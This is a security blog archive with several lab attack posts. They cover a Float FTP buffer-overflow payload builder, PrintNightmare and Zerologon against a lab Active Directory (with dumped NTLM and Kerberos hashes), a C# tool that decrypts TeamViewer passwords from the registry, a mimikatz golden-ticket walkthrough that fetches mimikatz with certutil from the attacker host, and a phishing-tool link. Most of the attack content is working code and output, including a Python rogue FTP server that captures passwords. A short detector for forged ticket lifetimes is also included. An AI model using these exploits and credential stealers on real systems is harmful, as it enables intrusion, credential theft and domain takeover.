
Saturday, October 30, 2021

FTP Float Exploiting: [Windows x86] Buffer Overflow [I]

Hi everyone!


So far so good. In this post I'm going to explain how to exploit a stack-based buffer overflow to get remote code execution (RCE).

The chosen vulnerable software is Float FTP, installed on a Windows XP x86 machine.


The software:


The connection from the attacker machine:



Debugger: Immunity Debugger with the mona Python plugin.





The buffer overflow exploit source code is available on my GitHub:



https://github.com/f0ns1/-Exploiting-BufferOverflow/tree/main


Exploit execution:


I promise to write a full and deep explanation of how to build the exploit, with the following steps:


- Understand the vulnerability

- Assembler quick introduction: operations/registers/stack/heap

- Fuzzing

- Cyclic pattern to obtain the offset

- EIP register control

- Shellcode injection
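The three middle steps (fuzzing, cyclic pattern to find the offset, EIP control and the final payload layout) can be driven from one small Python helper. The following is an added example written for this post, not the exploit from the GitHub repository above: the EIP value 0x37684136, the return address 0xDEADBEEF and the int3 stand-in shellcode are placeholders, not values taken from the Float FTP target, and the vulnerable field is assumed to be the USER argument.

```python
import socket
import struct
from itertools import product
from string import ascii_lowercase, ascii_uppercase, digits


def pattern_create(length: int) -> bytes:
    """Metasploit-style cyclic pattern (Aa0Aa1...Aa9Ab0...): every 4-byte
    window is unique, so the bytes that land in EIP identify their offset."""
    out = bytearray()
    for upper, lower, digit in product(ascii_uppercase, ascii_lowercase, digits):
        out += (upper + lower + digit).encode()
        if len(out) >= length:
            break
    return bytes(out[:length])


def pattern_offset(pattern: bytes, eip: int) -> int:
    """Offset of the 4 bytes that overwrote EIP. x86 is little-endian, so the
    value the debugger shows (e.g. 0x37684136) is packed with '<I' first."""
    needle = struct.pack("<I", eip)
    idx = pattern.find(needle)
    if idx < 0:
        raise ValueError("EIP value not in pattern; send a longer pattern")
    return idx


def bad_chars_in(data: bytes, badchars: bytes = b"\x00\x0a\x0d") -> set:
    """Bytes that would truncate or mangle an FTP command line (NUL, LF, CR)."""
    return set(data) & set(badchars)


def build_payload(offset: int, ret_addr: int, shellcode: bytes,
                  nop_len: int = 16, total: int = 600) -> bytes:
    """junk | EIP (address of a JMP ESP) | NOP sled | shellcode | filler."""
    eip = struct.pack("<I", ret_addr)
    bad = bad_chars_in(eip + shellcode)
    if bad:
        raise ValueError("bad characters in return address or shellcode: %r" % bad)
    payload = b"A" * offset + eip + b"\x90" * nop_len + shellcode
    return payload + b"C" * max(0, total - len(payload))


def fuzz_buffers(start: int = 100, step: int = 100, stop: int = 3000):
    """Increasing 'A' buffers for the fuzzing step; the first one that gets
    no reply (server crashed) brackets the vulnerable size."""
    return [b"A" * n for n in range(start, stop + 1, step)]


def send_user(host: str, port: int, data: bytes, timeout: float = 3.0) -> bytes:
    """Send data as the USER argument; an empty result means no reply (crash)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.recv(1024)  # banner
        s.sendall(b"USER " + data + b"\r\n")
        try:
            return s.recv(1024)
        except socket.timeout:
            return b""


if __name__ == "__main__":
    # Offline walkthrough with constructed values: the EIP value and the
    # JMP ESP address are placeholders, not figures from the Float FTP target.
    pattern = pattern_create(600)
    offset = pattern_offset(pattern, 0x37684136)  # -> 230 for this pattern
    payload = build_payload(offset, 0xDEADBEEF, b"\xcc" * 4)  # int3 as stand-in shellcode
    print("offset:", offset, "payload length:", len(payload))
```

In practice you send `fuzz_buffers()` one by one with `send_user` until the server stops answering, send `pattern_create()` of a slightly larger size, read EIP in Immunity Debugger, and feed it to `pattern_offset`. The return address comes from `!mona jmp -r esp` (a module without ASLR/SafeSEH), and `bad_chars_in` is the reason FTP exploits avoid 0x00, 0x0a and 0x0d in the shellcode.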


Best regards! I hope you enjoy it; we'll keep in touch ;) F0ns1.

  




Monday, October 18, 2021

Active Directory CORPORATIVE.domain.local Series[XI] : PrintNightmare Privilege Escalation

Hi everyone!

So far so good. In this post I perform a local privilege escalation using the well-known 2021 vulnerability:

PrintNightmare

A non-administrative user can install a new printer driver through the Print Spooler service, which then loads the attacker's DLL as SYSTEM:

CVE-2021-1675 - CVE-2021-34527

https://github.com/ly4k/PrintNightmare

https://github.com/calebstewart/CVE-2021-1675


└─$ python3 printnightmare.py  -check  "Administrator:Passw0rd1@10.0.2.22"                            

Impacket v0.9.24.dev1+20211015.125134.c0ec6102 - Copyright 2021 SecureAuth Corporation


[*] Target appears to be vulnerable!

   

Validate printer sharing between the external attacker machine and the target server:


                          

Execute the privilege escalation exploit on the target system:




Verify with an external psexec connection over SMB, writing to C$:






And that's all. For this kind of attack, I hope all companies apply the vendor's recommended patches!

Best regards, f0ns1


Friday, October 15, 2021

RedTeam Challenge: Project S0c14l M3d1a series[III]

Hi everyone!


So far so good! In this post I'm going to explain how to perform a social network phishing attack with an easy tool:



https://github.com/xHak9x/SocialPhish

https://my.freenom.com/

https://tinyurl.com/app/

And that's all. Against this kind of attack, I hope everyone reviews the URLs and links in emails and direct messages on social networks.

Best regards, f0ns1

Wednesday, October 13, 2021

Active Directory CORPORATIVE.domain.local Series[X] : Zerologon attack

Hi everyone!


So far so good. In this post I'm going to explain how to perform the Zerologon attack against Active Directory in my local lab environment CORPORATIVE.DOMAIN.local.




This vulnerability was discovered in 2020 and allows a remote, unauthenticated attacker to take over the domain controller's machine account and dump every hash from the Active Directory target machine:

CVE-2020-1472


The first step is to detect whether the target system is vulnerable. For this task it's possible to use the following Python script:


And to perform the attack it's possible to use the following exploit:




Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrador:500:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::
Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
CORPORATIVE.DOMAIN.local\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:74b9c26e436d8ceacd2db129dbed8091:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
CORPORATIVE.DOMAIN.local\worker1:1106:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::
CORPORATIVE.DOMAIN.local\worker2:1107:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::
CORPORATIVE.DOMAIN.local\SVC_service:1109:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::
CORPORATIVE.DOMAIN.local\NP_user:1110:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::
CORPORATIVE.DOMAIN.local\test_user:1111:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::
CORPORATIVE-DOM$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WKS-002$:1103:aad3b435b51404eeaad3b435b51404ee:26ea21a020599bf2757bdef562adbcc7:::
WKS-001$:1104:aad3b435b51404eeaad3b435b51404ee:efe101633fb3881f250d512d388cb700:::
[*] Kerberos keys grabbed
CORPORATIVE.DOMAIN.local\krbtgt:aes256-cts-hmac-sha1-96:178c2ad109c08f5f1396f956f899e65c8e3ca03e77ea180584e5b0c5ed5cd25e
CORPORATIVE.DOMAIN.local\krbtgt:aes128-cts-hmac-sha1-96:84edbefb34b31b613865a44d4bf66e05
CORPORATIVE.DOMAIN.local\krbtgt:des-cbc-md5:46a25ef4f8cbec0d
CORPORATIVE.DOMAIN.local\worker1:aes256-cts-hmac-sha1-96:4686da5eda179be4c46be0524b5590509408301b15a03150cc901d58dc25ea02
CORPORATIVE.DOMAIN.local\worker1:aes128-cts-hmac-sha1-96:a5272782e4809030425764777b89b377
CORPORATIVE.DOMAIN.local\worker1:des-cbc-md5:0816198940dae589
CORPORATIVE.DOMAIN.local\worker2:aes256-cts-hmac-sha1-96:fb1ac4dd6cdc58614db210da4296f60f4f76931c7ed783ba7d4c2d23ab6ae153
CORPORATIVE.DOMAIN.local\worker2:aes128-cts-hmac-sha1-96:f55967570c4b562cc3fdd696d37603cc
CORPORATIVE.DOMAIN.local\worker2:des-cbc-md5:5bb5cb23076e5eef
CORPORATIVE.DOMAIN.local\SVC_service:aes256-cts-hmac-sha1-96:53cb07135999888c62a8cf58a449cc24e89ad12c3dd5f26d373657947fc2578f
CORPORATIVE.DOMAIN.local\SVC_service:aes128-cts-hmac-sha1-96:08398a5e5779afef70121bd2fe8c5153
CORPORATIVE.DOMAIN.local\SVC_service:des-cbc-md5:5b29adb0efa81691
CORPORATIVE.DOMAIN.local\NP_user:aes256-cts-hmac-sha1-96:f537750e75139946ed51cfb8337314d127a17d3137a5ef8efec6b0becabebaac
CORPORATIVE.DOMAIN.local\NP_user:aes128-cts-hmac-sha1-96:07301297fb5aad297fb0a6b7bd2eeeed
CORPORATIVE.DOMAIN.local\NP_user:des-cbc-md5:a4296d1c2ce010c7
CORPORATIVE.DOMAIN.local\test_user:aes256-cts-hmac-sha1-96:d24ab0db83b636a6065d12d7451cbe5d8512a381caccac9e94ddd3ca2d0844d9
CORPORATIVE.DOMAIN.local\test_user:aes128-cts-hmac-sha1-96:48bf29b09e9d4753f58c9a249cc3ec4b
CORPORATIVE.DOMAIN.local\test_user:des-cbc-md5:15801c91c8a7ea29
CORPORATIVE-DOM$:aes256-cts-hmac-sha1-96:7ffab151f9fc7485b70447cab3373921338bf88906703fd5d4deb9d4a87fde16
CORPORATIVE-DOM$:aes128-cts-hmac-sha1-96:2d714652efe8aec574dd8ffce8e7ef8e
CORPORATIVE-DOM$:des-cbc-md5:a4e6b6ae5837806d
WKS-002$:aes256-cts-hmac-sha1-96:bc3ef9250185b6844385fae85f47c69e0e21f9e69a7ff2a9a5fd0fa28fdd91c9
WKS-002$:aes128-cts-hmac-sha1-96:c7431351b05123fcd6039f1611db23a4
WKS-002$:des-cbc-md5:32b6861998ba5e1c
WKS-001$:aes256-cts-hmac-sha1-96:57ee7e4e906c0fa2e8eea3b1dfadb4e6a4e036ae0c8e8b47728da431068a7efb
WKS-001$:aes128-cts-hmac-sha1-96:d34b1290f3df609fe9aa4d808004ee98
WKS-001$:des-cbc-md5:020be94686e05e07
[*] Cleaning up... 

And access using pass-the-hash:








As you can see in the following documentation, this vulnerability could be exploited because the function ComputeNetlogonCredential uses a fixed all-zero IV for its AES-CFB8 encryption instead of a random one. With an all-zero IV and an all-zero plaintext (the client challenge), the output is all zeros for about one key in 256, so an attacker who keeps sending a zero challenge and a zero credential gets accepted after a few hundred attempts without knowing the machine account password.

https://www.crowdstrike.com/blog/cve-2020-1472-zerologon-security-advisory/

And that's all. For this kind of attack, I hope all companies apply the vendor's recommended patches!

Best regards, f0ns1

 

Tuesday, October 12, 2021

Teamviewer Extract credentials [csharp]

 

Hi everyone,


Extract TeamViewer credentials from the registry:



Source code:


using System;
using System.Text;
using Microsoft.Win32;
using System.Security.Cryptography;

namespace DecryptTeamViewer
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("\r\n\r\n=== DecryptTeamViewer: Pillaging registry for TeamViewer information ===\r\n");

            // TeamViewer version
            Console.WriteLine("\r\n=== TeamViewer version ===\r\n");
            Console.WriteLine(GetRegValue("TeamViewerSettings", "Version"));

            // User info
            Console.WriteLine("\r\n=== User Information ===\r\n");
            Console.WriteLine("Account name: " + GetRegValue("TeamViewerSettings", "OwningManagerAccountName"));
            Console.WriteLine("User email: " + GetRegValue("TeamViewerUserSettings", "BuddyLoginName"));

            // Proxy info
            Console.WriteLine("\r\n=== Proxy Information ===\r\n");
            Console.WriteLine("Proxy IP: " + GetRegValue("TeamViewerSettings", "Proxy_IP"));
            Console.WriteLine("Proxy username: " + GetRegValue("TeamViewerSettings", "ProxyUsername"));
            var proxyPass = GetRegValue("TeamViewerSettings", "ProxyPasswordAES") as byte[];
            Console.WriteLine("Proxy password: " + DecryptAES(proxyPass));

            // Credentials (stored as AES blobs in REG_BINARY values)
            Console.WriteLine("\r\n=== Decrypted Credentials ===\r\n");
            // Options pass
            var optionsPass = GetRegValue("TeamViewerSettings", "OptionsPasswordAES") as byte[];
            Console.WriteLine("TeamViewer options password: " + DecryptAES(optionsPass));
            // Server pass
            var serverPass = GetRegValue("TeamViewerSettings", "ServerPasswordAES") as byte[];
            Console.WriteLine("TeamViewer server password: " + DecryptAES(serverPass));
            // Security pass
            var securityPass = GetRegValue("TeamViewerSettings", "SecurityPasswordAES") as byte[];
            var exportedSecurityPass = GetRegValue("TeamViewerSettings", "SecurityPasswordExported") as byte[];
            Console.WriteLine("TeamViewer security password: " + DecryptAES(securityPass));
            Console.WriteLine("TeamViewer exported security password: " + DecryptAES(exportedSecurityPass));
            // License
            var licenseKey = GetRegValue("TeamViewerSettings", "LicenseKeyAES") as byte[];
            Console.WriteLine("TeamViewer license key: " + DecryptAES(licenseKey) + "\n");
        }

        // Reads a value from the TeamViewer registry keys; returns null when the key or value is missing
        public static object GetRegValue(string hive, string value)
        {
            RegistryKey regKey = null;
            if (hive == "TeamViewerSettings")
            {
                // Machine-wide settings (32-bit view on a 64-bit host, hence WOW6432Node)
                regKey = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\WOW6432Node\TeamViewer\Version7", false);
            }
            else if (hive == "TeamViewerUserSettings")
            {
                // Per-user settings
                regKey = Registry.CurrentUser.OpenSubKey(@"SOFTWARE\TeamViewer\Version7", false);
            }
            if (regKey == null)
            {
                return null;
            }
            using (regKey)
            {
                return regKey.GetValue(value);
            }
        }

        // Decrypts a *PasswordAES blob with TeamViewer's hard-coded AES-128-CBC key and IV
        public static string DecryptAES(byte[] encryptedPass)
        {
            if (encryptedPass == null || encryptedPass.Length == 0)
            {
                return null;
            }
            try
            {
                // AES settings
                using (Aes aes = new AesManaged
                {
                    Mode = CipherMode.CBC,
                    BlockSize = 128,
                    KeySize = 128,
                    Padding = PaddingMode.Zeros
                })
                {
                    // TeamViewer Key & IV (the same for every installation)
                    byte[] key = new byte[16] { 0x06, 0x02, 0x00, 0x00, 0x00, 0xa4, 0x00, 0x00, 0x52, 0x53, 0x41, 0x31, 0x00, 0x04, 0x00, 0x00 };
                    byte[] IV = new byte[16] { 0x01, 0x00, 0x01, 0x00, 0x67, 0x24, 0x4F, 0x43, 0x6e, 0x67, 0x62, 0xf2, 0x5e, 0xa8, 0xd7, 0x04 };

                    // Decrypt AES passwords
                    using (ICryptoTransform AESDecrypt = aes.CreateDecryptor(key, IV))
                    {
                        var decryptedPass = AESDecrypt.TransformFinalBlock(encryptedPass, 0, encryptedPass.Length);
                        // Stored strings are UTF-16LE; drop the zero padding
                        return Encoding.Unicode.GetString(decryptedPass).TrimEnd('\0');
                    }
                }
            }
            catch (CryptographicException)
            {
                return null;
            }
        }
    }
}



flag{50ImuYChUng0FFl0l0l0l0.}

Best regards, f0ns1

Saturday, October 9, 2021

[hacking with python] : webpage exploit [II] Privilege escalation and persistence streaming

Hi everyone,

This is the second part of my series: [hacking with python] : webpage exploit

Hacking on stream!!




And that's all, so easy!!!

Best regards, f0ns1


Friday, October 8, 2021

Active Directory CORPORATIVE.domain.local Series[IX] : GoldenTicket

Hi everyone!


So far so good! In this post I'm going to show how to attack Active Directory directly at the Domain Controller by forging a golden ticket. This kind of attack targets the KDC (Key Distribution Center): with the krbtgt account's key we can mint our own TGT, which gives us full persistence with administrative privileges, by default for ten years.




This attack needs administrator (Domain Admin) privileges on the Active Directory domain controller, because the krbtgt hash has to be dumped from the DC first.

1. EXPLOITATION:

    1.1 SHARE MIMIKATZ 

        kali@kali:~/Descargas/x64$ python3 -m http.server 8989

Serving HTTP on 0.0.0.0 port 8989 (http://0.0.0.0:8989/) ...

10.0.2.17 - - [19/Sep/2021 23:53:05] "GET /mimikatz.exe HTTP/1.1" 200 -

10.0.2.17 - - [19/Sep/2021 23:53:05] "GET /mimikatz.exe HTTP/1.1" 200 -



    1.2 OBTAIN MIMIKATZ BINARY
        
            

        C:\Users\worker2\golden_ticket>certutil.exe -urlcache -f http://10.0.2.19:8989/mimikatz.exe mimikatz.exexe
****  En línea  ****
CertUtil: -URLCache comando completado correctamente.

C:\Users\worker2\golden_ticket>dir
 El volumen de la unidad C no tiene etiqueta.
 El número de serie del volumen es: BE72-396A

 Directorio de C:\Users\worker2\golden_ticket

20/09/2021  17:05    <DIR>          .
20/09/2021  17:05    <DIR>          ..
20/09/2021  17:05         1.355.680 mimikatz.exexe
               1 archivos      1.355.680 bytes
               2 dirs   3.095.617.536 bytes libres




C:\Users\worker2\golden_ticket>

PS C:\Users\Administrador> .\mimikatz.exe


  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53

 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)

 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )

 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz

 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )

  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # lsadump::lsa /inject /name:krbtgt
Domain : CORPORATIVE / S-1-5-21-2048228633-4105951457-1013245227

RID  : 000001f6 (502)
User : krbtgt

 * Primary
    NTLM : 74b9c26e436d8ceacd2db129dbed8091
    LM   :
  Hash NTLM: 74b9c26e436d8ceacd2db129dbed8091
    ntlm- 0: 74b9c26e436d8ceacd2db129dbed8091
    lm  - 0: 0b85525f2bc07e8ddad5bc5116cda6be

 * WDigest
    01  529e053364e99c40018a763d093cd2d0
    02  0f153570e5bfc1beaf7af4548fe55407
    03  a2e7ca6217279efd9902dfec4f9c1ffc
    04  529e053364e99c40018a763d093cd2d0
    05  0f153570e5bfc1beaf7af4548fe55407
    06  a65e056b499477f816ceba51675d9710
    07  529e053364e99c40018a763d093cd2d0
    08  1afdffdfbb1a96b9eac70bf7c56c9918
    09  324a2bb9f95d144266eb7bccbe84e5ba
    10  560e55940f267584289f89a10c3a6a56
    11  c05c279a357cd56256c778bf63d45005
    12  324a2bb9f95d144266eb7bccbe84e5ba
    13  4d711b818095960a87259fa4fe347d3a
    14  c05c279a357cd56256c778bf63d45005
    15  080bb5dadc9fda118ed49eb23b1dec81
    16  c3c6dfa2a8c55fe7bd5460d3950d9cce
    17  dd4ec696ec2268f292b30966168ba6d2
    18  20bf77d7ae1c83731480dd3d58b83ead
    19  aa99179fb3b127c835e5c88014d5094f
    20  a94702c74ded36fba7260a834ae0a6ee
    21  c4c9af7a348d2321b2a366d16e26fc31
    22  c4c9af7a348d2321b2a366d16e26fc31
    23  0bac9a385f379934e709b3b9f2e1a6ee
    24  2b72cae08c1e9fb1c73e32b2418f237c
    25  127f40e154898bb85c338eed76bf7b28
    26  524d56073be5780737d7ffc2ed602391
    27  035dd1bc3fec5eacd425087efaefa33a
    28  d62ace76ae0c72b115a5f75d421c10cd
    29  9b274c0df827c3cf78d946c7d2f2a5a2

 * Kerberos
    Default Salt : CORPORATIVE.DOMAIN.LOCALkrbtgt
    Credentials
      des_cbc_md5       : 46a25ef4f8cbec0d

 * Kerberos-Newer-Keys
    Default Salt : CORPORATIVE.DOMAIN.LOCALkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 178c2ad109c08f5f1396f956f899e65c8e3ca03e77ea180584e5b0c5ed5cd25e
      aes128_hmac       (4096) : 84edbefb34b31b613865a44d4bf66e05
      des_cbc_md5       (4096) : 46a25ef4f8cbec0d

 * NTLM-Strong-NTOWF
    Random Value : f155a5de1b36973934e6291d7cc9c252


Generate the golden ticket (KIRBI file) from the krbtgt NTLM hash and the domain SID:

mimikatz # kerberos::golden /user:Administrador /domain:CORPORATIVE.DOMAIN.local /sid:S-1-5-21-2048228633-4105951457-101
3245227 /krbtgt:74b9c26e436d8ceacd2db129dbed8091 /ticket:ticket
User      : Administrador
Domain    : CORPORATIVE.DOMAIN.local (CORPORATIVE)
SID       : S-1-5-21-2048228633-4105951457-1013245227
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 74b9c26e436d8ceacd2db129dbed8091 - rc4_hmac_nt
Lifetime  : 20/09/2021 16:52:13 ; 18/09/2031 16:52:13 ; 18/09/2031 16:52:13
-> Ticket : ticket

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

List the tickets in the current logon session (note that this is the session's legitimate aes256 TGT with the normal 10-hour lifetime; the golden ticket was written to the file "ticket" and not injected, so it does not appear here):

mimikatz # kerberos::list

[00000000] - 0x00000012 - aes256_hmac

   Start/End/MaxRenew: 20/09/2021 16:42:45 ; 21/09/2021 2:42:45 ; 27/09/2021 16:42:45

   Server Name       : krbtgt/CORPORATIVE.DOMAIN.LOCAL @ CORPORATIVE.DOMAIN.LOCAL

   Client Name       : Administrador @ CORPORATIVE.DOMAIN.LOCAL

   Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;


Share an SMB folder from the Kali attacker machine:



And copy the ticket to it:

C:\Users\Administrador>copy ticket \\10.0.2.19\smbfolder\

        1 archivo(s) copiado(s).


1.3 GOLDEN TICKET (CCACHE):

Run the ticketer.py tool to obtain a ccache file:

 


List Ccache file:
root@kali:/home/kali/Master/lab4/test/data# ls -ltrh f0ns1*
-rw-r--r-- 1 root root 1,1K sep 27 20:54 f0ns1.ccache

 

Export the environment variable:
export KRB5CCNAME='f0ns1.ccache'

 

Access with the forged f0ns1 user, landing as NT AUTHORITY\SYSTEM, without knowing any password:
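From the blue-team side, the clearest giveaway in the output above is the ticket lifetime: mimikatz minted a TGT valid from 20/09/2021 to 18/09/2031, while the legitimate TGT in kerberos::list lives 10 hours and is renewable for 7 days, which are the default domain policy values. The following is an added example (not code from the post or from mimikatz) that parses those two timestamp lines, taken from this page as a constructed sample, and flags any ticket whose lifetime or renewal window exceeds the policy. The policy values and the dd/mm/yyyy date format of this lab's locale are assumptions; adjust both for your domain.

```python
import re
from datetime import datetime, timedelta

# Default domain Kerberos policy (assumption): TGT lifetime 10 hours, renewal window 7 days.
MAX_TICKET_LIFETIME = timedelta(hours=10)
MAX_RENEW_LIFETIME = timedelta(days=7)

# mimikatz prints times in the host locale; this lab's output is dd/mm/yyyy H:MM:SS.
DATE_FMT = "%d/%m/%Y %H:%M:%S"

# Constructed sample made of the two timestamp lines shown on this page:
# the kerberos::golden 'Lifetime' line and the kerberos::list 'Start/End/MaxRenew' line.
SAMPLE = """\
Lifetime  : 20/09/2021 16:52:13 ; 18/09/2031 16:52:13 ; 18/09/2031 16:52:13
   Start/End/MaxRenew: 20/09/2021 16:42:45 ; 21/09/2021 2:42:45 ; 27/09/2021 16:42:45
"""

TIMES_RE = re.compile(
    r"(?:Lifetime|Start/End/MaxRenew)\s*:\s*(.+?)\s*;\s*(.+?)\s*;\s*(.+?)\s*$")


def parse_ticket_times(line):
    """(start, end, max_renew) datetimes from a mimikatz timestamp line, else None."""
    m = TIMES_RE.search(line)
    if not m:
        return None
    return tuple(datetime.strptime(s, DATE_FMT) for s in m.groups())


def anomalies(line):
    """Policy violations for one ticket line; [] means the ticket looks normal,
    None means the line carries no ticket timestamps."""
    parsed = parse_ticket_times(line)
    if parsed is None:
        return None
    start, end, renew = parsed
    reasons = []
    if end - start > MAX_TICKET_LIFETIME:
        reasons.append("lifetime %s exceeds policy %s" % (end - start, MAX_TICKET_LIFETIME))
    if renew - start > MAX_RENEW_LIFETIME:
        reasons.append("renew window %s exceeds policy %s" % (renew - start, MAX_RENEW_LIFETIME))
    return reasons


def scan(text):
    """All ticket timestamp lines in text, each paired with its anomalies."""
    results = []
    for line in text.splitlines():
        reasons = anomalies(line)
        if reasons is not None:
            results.append((line.strip(), reasons))
    return results


if __name__ == "__main__":
    for line, reasons in scan(SAMPLE):
        print("SUSPICIOUS" if reasons else "ok        ", line)
        for reason in reasons:
            print("    -", reason)
```

The same check applies to klist output on a workstation and to the ticket lifetime fields in Kerberos event logs (4768/4769); a ticket that outlives the domain policy can only come from a forged ticket, since the KDC never issues one. The other classic indicators in the kerberos::golden output above are the rc4_hmac_nt service key on a domain that otherwise issues aes256 tickets, and a PAC listing groups 512/518/519/520 for a user that has none of them in AD.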


And that's all for this Active Directory attack. I hope you enjoy my ninth Windows entry and follow my blog [https://roadtooscp-f0ns1.blogspot.com/]. We'll keep in touch.

Rogue Servers: network attacks FTP series [I]

Hi everyone,


So far so good. Today we are going to perform a local network attack using rogue servers from the auxiliary modules of the Metasploit framework.



Type of attack: FTP server.

    - The flag is to capture the user's credentials.

Attack one:

    - Direct connection between the victim and the attacker's server (test the FTP credential capture).

Attack two:

    - ARP spoofing with my own Python hacking tool:

    https://github.com/f0ns1/evilHackingPythonTool

    - DNS spoofing with another Python hacking tool:

    https://github.com/f0ns1/mitm_process.py

    - Spoofed connection between the client and the "fake" FTP server:
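The rogue FTP server itself is a few lines of protocol handling: answer the greeting, accept USER, ask for the password with 331, and record the PASS argument before rejecting the login with 530, which is what the Metasploit auxiliary/server/capture/ftp module does. The following is an added example written for this post (not the Metasploit module and not code from the tools linked above) that implements that behaviour in plain Python so the captured pairs can be inspected; the "worker1"/"S3cret!" credentials in the demo are constructed. The ARP/DNS spoofing step from attack two is assumed to already redirect the victim to this host, and the server must then listen on port 21, which needs root or CAP_NET_BIND_SERVICE.

```python
import socketserver
import threading

CAPTURED = []  # (client_ip, user, password) collected across all connections


class Session:
    """Per-connection state: the last USER seen and the (user, pass) pairs captured."""
    def __init__(self):
        self.user = None
        self.captured = []


def ftp_response(session, line):
    """Reply for one FTP command. The server behaves like a real one up to PASS,
    then answers 530 so the victim only sees a wrong-password error (and often
    types the password again, giving us another sample)."""
    cmd, _, arg = line.strip().partition(" ")
    cmd = cmd.upper()
    if cmd == "USER":
        session.user = arg
        return "331 Password required for %s\r\n" % arg
    if cmd == "PASS":
        session.captured.append((session.user, arg))
        return "530 Login incorrect.\r\n"
    if cmd == "QUIT":
        return "221 Goodbye.\r\n"
    return "530 Please login with USER and PASS.\r\n"


class RogueFtpHandler(socketserver.StreamRequestHandler):
    def handle(self):
        session = Session()
        synced = 0
        self.wfile.write(b"220 FTP server ready.\r\n")
        for raw in self.rfile:
            line = raw.decode("latin-1")
            reply = ftp_response(session, line)
            # Publish captured pairs before replying, so they are visible as soon
            # as the client receives the 530.
            while synced < len(session.captured):
                CAPTURED.append((self.client_address[0],) + session.captured[synced])
                synced += 1
            self.wfile.write(reply.encode())
            if reply.startswith("221"):
                break


def serve(host="0.0.0.0", port=2121):
    """Start the rogue server in a background thread and return it.
    Use port 21 for a real victim (needs root or CAP_NET_BIND_SERVICE)."""
    socketserver.ThreadingTCPServer.allow_reuse_address = True
    srv = socketserver.ThreadingTCPServer((host, port), RogueFtpHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def run_sample_session(lines):
    """Drive the protocol logic offline with a constructed command list."""
    session = Session()
    replies = [ftp_response(session, line) for line in lines]
    return replies, session.captured


if __name__ == "__main__":
    import ftplib
    srv = serve("127.0.0.1", 0)  # port 0: pick a free port for the local demo
    port = srv.server_address[1]
    ftp = ftplib.FTP()
    ftp.connect("127.0.0.1", port)
    try:
        ftp.login("worker1", "S3cret!")  # constructed victim credentials
    except ftplib.error_perm as err:
        print("victim sees:", err)
    ftp.close()
    print("captured:", CAPTURED)
    srv.shutdown()
```

Running the block connects a local ftplib client to the rogue server and prints the captured (ip, user, password) tuple; the victim side only sees "530 Login incorrect." The point for defenders is the one in the sign-off below: FTP sends the password in clear text, so any host that can answer on port 21 (by a direct connection, ARP spoofing or DNS spoofing) collects it.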








And that's all for this kind of rogue FTP server network attack.

I hope this attack is helpful for you; enjoy.

Regards, f0ns1.





